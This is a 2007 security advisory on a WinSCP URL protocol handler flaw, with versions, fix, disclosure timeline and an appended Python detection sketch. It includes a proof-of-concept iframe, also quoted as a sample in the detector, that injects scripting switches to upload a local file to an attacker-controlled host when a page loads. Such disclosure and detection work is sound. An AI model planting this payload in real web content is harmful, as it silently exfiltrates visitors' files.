WinSCP URL Protocol Handler Flaw

Summary

By default WinSCP installs URL protocol handlers for the scp:// and sftp:// protocols. These could be used by malicious web content to automatically upload any file from the local system to a remote server, or automatically download files from a remote server to the local system.

Since version 3.8.2 WinSCP has included some protection against this, but it does not stop all forms of attack.

Credit:

The information has been provided by Kender.Security.


Details

Vulnerable Systems:
 * WinSCP version 4.0.3

Immune Systems:
 * WinSCP version 4.0.4

On a machine you control, set up an scp-only account with the username 'scp' and any password. Place this on a website:

<iframe src=’scp:password@yourhost.com:’ /console /command ‘option confirm off’ ‘put c:boot.ini’ close exit ”/>

This will upload a file to the server when the page is visited by a user with a vulnerable WinSCP installed.

Downloading a file from the server to any location writable by the current user also works.
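
A detection sketch for the behaviour described above, added here and not part of the original advisory: it flags WinSCP process command lines in which an scp: or sftp: handler URL is followed by scripting switches such as /console or /command. The function names, install path, host names and sample command lines are constructed assumptions.

```python
import re

# Real WinSCP switches that start scripted, non-interactive operation.
SCRIPTING_SWITCHES = {"/console", "/command", "/script"}
HANDLER_SCHEMES = ("scp:", "sftp:")
WINSCP_IMAGES = {"winscp.exe", "winscp.com"}

# Constructed process-creation command lines (not captured from a real host).
SAMPLES = [
    r'"C:\Program Files\WinSCP\WinSCP.exe" "sftp://user@files.example.com/"',
    r'"C:\Program Files\WinSCP\WinSCP.exe" "scp://scp:password@host.example:" '
    r'/console /command "option confirm off" "put c:\boot.ini" close exit ""',
    r'"C:\Program Files\WinSCP\WinSCP.exe" /console /script=C:\jobs\backup.txt',
    r'C:\Windows\notepad.exe scp:notes.txt /console',
]


def tokenize(cmdline):
    """Split a Windows command line into arguments, keeping quoted runs whole."""
    return [t.strip('"') for t in re.findall(r'"[^"]*"|\S+', cmdline)]


def injected_switches(cmdline):
    """Return scripting switches that follow a handler URL in a WinSCP launch."""
    tokens = tokenize(cmdline)
    if not tokens:
        return []
    image = re.split(r"[\\/]", tokens[0])[-1].lower()
    if image not in WINSCP_IMAGES:
        return []
    # A launch through the URL protocol handler carries the URL as an argument.
    url_at = next((i for i, t in enumerate(tokens[1:], 1)
                   if t.lower().startswith(HANDLER_SCHEMES)), None)
    if url_at is None:
        return []  # scripted use without a handler URL is ordinary automation
    names = [t.split("=", 1)[0].lower() for t in tokens[url_at + 1:]]
    return [n for n in names if n in SCRIPTING_SWITCHES]


if __name__ == "__main__":
    for line in SAMPLES:
        hits = injected_switches(line)
        print("ALERT" if hits else "ok   ", hits, line[:60])
```

A browser-launched WinSCP session normally receives only the URL, so any hit is worth correlating with the parent process that started WinSCP.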

Solution:
Upgrade to version 4.0.4 or higher from http://winscp.net/download.php

Disclosure Timeline
24-Jul-2007 Vulnerability reported to Martin Prikryl
25-07-2007 Proposed fix to Martin
31-07-2007 Response from Martin
01-09-2007 Martin confirms fix
02-09-2007 New version done
06-09-2007 WinSCP v4.0.4 released
